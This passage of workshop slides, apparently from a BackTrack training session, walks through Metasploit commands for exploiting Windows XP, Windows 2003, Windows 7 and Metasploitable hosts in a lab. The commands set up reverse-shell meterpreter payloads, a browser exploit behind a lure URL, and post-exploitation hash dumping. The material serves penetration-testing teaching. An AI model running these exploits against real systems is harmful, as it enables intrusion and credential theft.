  • 29. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 30. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  • 31. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 32. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
  • 33. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  • 34. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit
  • 35. Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
  • 36. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  • 37. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
  • 38. Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : • Network adapter : Bridge • Get 4 Pictures by your self & shutdown the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack
  • 39. Challenge in 45 minutes :)